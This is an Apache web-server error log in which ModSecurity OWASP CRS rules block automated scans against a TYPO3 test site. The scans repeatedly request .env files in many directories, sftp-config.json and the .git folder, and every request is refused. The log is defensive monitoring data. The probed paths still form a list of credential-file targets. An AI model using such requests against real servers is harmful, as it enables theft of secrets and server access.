[Wed Feb 19 23:28:57.115448 2025] [:error] [pid 1258386] [client 45.148.10.166:16506] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z7ZbKaAIC5wiEYk6JNGCiAAAAAE"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.115891 2025] [:error] [pid 1258386] [client 45.148.10.166:16506] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z7ZbKaAIC5wiEYk6JNGCiAAAAAE"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.346940 2025] [:error] [pid 1258385] [client 45.148.10.166:16508] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7ZbKZMb97vBIjpxehUPbAAAAAA"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.347878 2025] [:error] [pid 1258385] [client 45.148.10.166:16508] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7ZbKZMb97vBIjpxehUPbAAAAAA"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.348942 2025] [:error] [pid 1258385] [client 45.148.10.166:16508] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7ZbKZMb97vBIjpxehUPbAAAAAA"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.551292 2025] [:error] [pid 1258389] [client 45.148.10.166:16514] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7ZbKY5l_i530XSrJBnIqwAAAAQ"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.552331 2025] [:error] [pid 1258389] [client 45.148.10.166:16514] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7ZbKY5l_i530XSrJBnIqwAAAAQ"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.552835 2025] [:error] [pid 1258389] [client 45.148.10.166:16514] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7ZbKY5l_i530XSrJBnIqwAAAAQ"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.726073 2025] [:error] [pid 1259200] [client 45.148.10.166:16528] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "Z7ZbKZybKOPXlKDbX1SY7QAAAAY"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.727340 2025] [:error] [pid 1259200] [client 45.148.10.166:16528] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "Z7ZbKZybKOPXlKDbX1SY7QAAAAY"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.727794 2025] [:error] [pid 1259200] [client 45.148.10.166:16528] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "Z7ZbKZybKOPXlKDbX1SY7QAAAAY"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.944418 2025] [:error] [pid 1259203] [client 45.148.10.166:16542] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7ZbKcO0jkjfdQXx8it8RgAAAAg"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.945703 2025] [:error] [pid 1259203] [client 45.148.10.166:16542] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7ZbKcO0jkjfdQXx8it8RgAAAAg"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.946194 2025] [:error] [pid 1259203] [client 45.148.10.166:16542] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7ZbKcO0jkjfdQXx8it8RgAAAAg"], referer: https://www.google.com/
[Wed Feb 19 23:28:58.548616 2025] [:error] [pid 1258388] [client 45.148.10.166:16570] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z7ZbKgzqEFiMFYV11ByxaQAAAAM"], referer: https://www.google.com/
[Wed Feb 19 23:28:58.549577 2025] [:error] [pid 1258388] [client 45.148.10.166:16570] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z7ZbKgzqEFiMFYV11ByxaQAAAAM"], referer: https://www.google.com/
[Wed Feb 19 23:28:58.550067 2025] [:error] [pid 1258388] [client 45.148.10.166:16570] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z7ZbKgzqEFiMFYV11ByxaQAAAAM"], referer: https://www.google.com/
[Wed Feb 19 23:28:58.743293 2025] [:error] [pid 1259335] [client 45.148.10.166:16576] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7ZbKoC8jifnO0kJgZgwbwAAAAk"], referer: https://www.google.com/
[Wed Feb 19 23:28:58.744301 2025] [:error] [pid 1259335] [client 45.148.10.166:16576] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7ZbKoC8jifnO0kJgZgwbwAAAAk"], referer: https://www.google.com/
[Wed Feb 19 23:28:58.744767 2025] [:error] [pid 1259335] [client 45.148.10.166:16576] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7ZbKoC8jifnO0kJgZgwbwAAAAk"], referer: https://www.google.com/
[Wed Feb 19 23:28:58.941038 2025] [:error] [pid 1258425] [client 45.148.10.166:16582] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z7ZbKiMcT3_Z2BZK5CWdYgAAAAU"], referer: https://www.google.com/
[Wed Feb 19 23:28:58.941996 2025] [:error] [pid 1258425] [client 45.148.10.166:16582] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z7ZbKiMcT3_Z2BZK5CWdYgAAAAU"], referer: https://www.google.com/
[Wed Feb 19 23:28:58.942567 2025] [:error] [pid 1258425] [client 45.148.10.166:16582] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z7ZbKiMcT3_Z2BZK5CWdYgAAAAU"], referer: https://www.google.com/
[Fri Feb 21 21:04:42.549373 2025] [authz_core:error] [pid 1307423] [client 52.66.240.57:46560] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Feb 22 12:37:58.662368 2025] [authz_core:error] [pid 1324879] [client 52.66.240.57:43502] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Feb 24 15:16:14.063395 2025] [:error] [pid 1368034] [client 13.36.235.132:50122] [client 13.36.235.132] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "Z7x_LmdMAbk4KVeOiKzKPQAAAAo"]
[Mon Feb 24 15:16:14.065738 2025] [:error] [pid 1368034] [client 13.36.235.132:50122] [client 13.36.235.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "Z7x_LmdMAbk4KVeOiKzKPQAAAAo"]
[Mon Feb 24 15:16:14.066188 2025] [:error] [pid 1368034] [client 13.36.235.132:50122] [client 13.36.235.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "Z7x_LmdMAbk4KVeOiKzKPQAAAAo"]
[Thu Feb 27 17:54:27.222545 2025] [authz_core:error] [pid 1445621] [client 18.133.175.70:47460] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Mar 01 07:23:06.371968 2025] [authz_core:error] [pid 1493081] [client 45.148.10.80:57070] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Mar 09 19:17:27.517239 2025] [:error] [pid 1666478] [client 45.148.10.237:48240] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z83bN76vWnrxIZA2nl05XgAAAAE"]
[Sun Mar 09 19:17:27.519847 2025] [:error] [pid 1666478] [client 45.148.10.237:48240] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z83bN76vWnrxIZA2nl05XgAAAAE"]
[Sun Mar 09 19:17:27.520232 2025] [:error] [pid 1666478] [client 45.148.10.237:48240] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z83bN76vWnrxIZA2nl05XgAAAAE"]
[Sun Mar 09 19:17:27.706081 2025] [:error] [pid 1661012] [client 45.148.10.237:48270] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z83bN8c5LHaxeidRofnWegAAAAQ"]
[Sun Mar 09 19:17:27.706765 2025] [:error] [pid 1661012] [client 45.148.10.237:48270] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z83bN8c5LHaxeidRofnWegAAAAQ"]
[Sun Mar 09 19:17:27.710301 2025] [:error] [pid 1661012] [client 45.148.10.237:48270] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z83bN8c5LHaxeidRofnWegAAAAQ"]
[Sun Mar 09 19:17:28.106651 2025] [:error] [pid 1661010] [client 45.148.10.237:48452] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z83bOKdqfb713GEcCO4g7wAAAAI"]
[Sun Mar 09 19:17:28.107230 2025] [:error] [pid 1661010] [client 45.148.10.237:48452] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z83bOKdqfb713GEcCO4g7wAAAAI"]
[Sun Mar 09 19:17:28.107651 2025] [:error] [pid 1661010] [client 45.148.10.237:48452] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z83bOKdqfb713GEcCO4g7wAAAAI"]
[Sun Mar 09 19:17:28.200782 2025] [:error] [pid 1661011] [client 45.148.10.237:48490] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z83bOKPGLf7u63PDybKjNwAAAAM"]
[Sun Mar 09 19:17:28.201355 2025] [:error] [pid 1661011] [client 45.148.10.237:48490] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z83bOKPGLf7u63PDybKjNwAAAAM"]
[Sun Mar 09 19:17:28.201788 2025] [:error] [pid 1661011] [client 45.148.10.237:48490] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z83bOKPGLf7u63PDybKjNwAAAAM"]
[Sun Mar 09 19:17:28.305460 2025] [:error] [pid 1661010] [client 45.148.10.237:48532] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z83bOKdqfb713GEcCO4g8AAAAAI"]
